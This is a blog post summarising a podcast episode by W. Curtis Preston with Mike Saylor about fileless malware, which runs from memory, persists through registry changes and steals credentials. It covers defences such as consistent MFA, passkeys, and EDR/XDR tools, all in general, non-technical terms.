Fileless malware is one of the most dangerous attack types in the cybersecurity world right now, and the reason most people haven’t heard of it is also the reason it’s so effective: it leaves no trace. No file on your hard drive. No signature for your antivirus to find. Just malicious code sitting quietly in your RAM, doing what it was sent to do — and most of the time, nobody knows it’s there until it’s way too late.
This blog post summarizes the main points of my latest podcast episode. If you’d like, you can listen to it or watch it at https://www.backupwrapup.com/fileless-malware-attack-lives-in-memory-leaves-no-trace.
I’ll be honest with you — this topic pushed the edges of my own knowledge, and I’ve been doing this for over 30 years. I brought in Dr. Mike Saylor, my co-author on Learning Ransomware Response & Recovery, to walk me through it. And by the time we were done, I had a much clearer picture of why fileless malware is such a big deal, what defenders need to know, and — maybe more importantly — what you can actually do about it today.
What Fileless Malware Actually Is
Traditional malware works by downloading something to your hard drive. Your antivirus sees it, flags it, quarantines it. That’s the game your security tools are built to play. Fileless malware doesn’t play that game. Instead of writing anything to disk, it loads directly into memory — RAM — and runs from there. Memory is volatile, meaning it gets wiped when you power down. So in theory, a reboot should clear it out. Here’s the problem: bad guys figured that out a long time ago.
What they do instead is modify the operating system or inject entries into the Windows registry so that when the machine restarts, the malware reloads itself right back into memory. In the ArcGIS attack that Mike referenced in our episode, attackers actually rewrote the base software the tool ran on — so every time the server rebooted, it reinfected itself. They were sitting inside that network undetected for two years. Two years. The only way to get rid of it was to wipe and re-image every affected machine from scratch.
That’s the thing about fileless malware — it’s not just stealthy on the way in. It’s engineered to stay.
Why Fileless Malware Loves Your Credentials
Here’s where it gets really interesting, and really dangerous. Memory isn’t just where code runs — it’s where your credentials live. Session tokens, admin logins, RDP sessions, network share authentication — all of that passes through RAM. Fileless malware is often specifically designed to harvest those credentials. It’ll sit there quietly, map out everything it has access to, and then either hand those credentials off to an initial access broker or use them to move laterally across your network.
Mike made a point that stuck with me: fileless malware is usually phase one. The silent, stealthy foothold. The recon mission. Once it’s figured out what it has access to, it escalates — and fast. By the time you know something’s wrong, the attackers have likely already moved well beyond the machine where they got in.
This is also why storing credentials in your browser is such a problem. Fileless malware looks there first. If you’ve got session tokens cached, saved passwords, or trusted devices that skip MFA prompts — all of that is low-hanging fruit.
MFA Is Good. MFA Done Wrong Is Almost Useless.
We talk about MFA a lot on this show, and Mike had some strong words about it in this episode. The concept is solid. The execution is often terrible. A company can turn MFA on and still be wide open if they’re letting people save credentials in the browser, trust machines so they can skip the prompt, or cache session tokens that fileless malware can grab and use to hijack an active session — no password required, no MFA prompt triggered.
MFA only works if you do it every time. Not most of the time. Every time.
The better answer, Mike says, is passkeys — FIDO-compliant authentication that doesn’t rely on a session token that can be stolen. And beyond that, one thing I didn’t know about MFA before this conversation: it’s not just designed to keep bad guys out. It’s also designed to tell you when bad guys are trying to get in. If you get an MFA prompt you didn’t initiate, that means someone already has your password. That’s a signal. Don’t ignore it.
When It’s Time for EDR — and What That Actually Means
Once you’ve got the basics covered — good MFA, passkeys where you can, no saved credentials in the browser — the next level is EDR. Endpoint Detection and Response. Think of it as the evolution of antivirus, but actually capable of dealing with fileless malware.
Modern EDR tools don’t just look for files. They monitor memory, watch process behavior, sandbox new activity to see how it behaves, and — critically — they can take action. Isolate a machine from the network. Suspend a user account in Active Directory. Write new firewall rules. Tools like Huntress are doing volatile memory analysis and behavior-based detection that traditional antivirus simply can’t do.
Pair your EDR with XDR — Extended Detection and Response — and you get visibility into everything: east-west traffic inside your network, north-south traffic coming in and going out. You can see where an attack came from, where it went, who it talked to, and what it touched. That’s the full picture you need to actually respond to a fileless malware incident rather than just discover it two years later.
This is the 401k conversation. Don’t have it before you’ve built your emergency fund. But when you’re ready, it’s one of the most powerful upgrades you can make to your security posture.
Written by W. Curtis Preston (@wcpreston), four-time O'Reilly author, and host of The Backup Wrap-up podcast. I am now the Technology Evangelist at S2|DATA, which helps companies manage their legacy data
